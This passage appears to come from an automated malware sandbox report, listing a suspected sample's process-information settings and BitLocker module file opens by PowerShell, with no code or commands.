Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
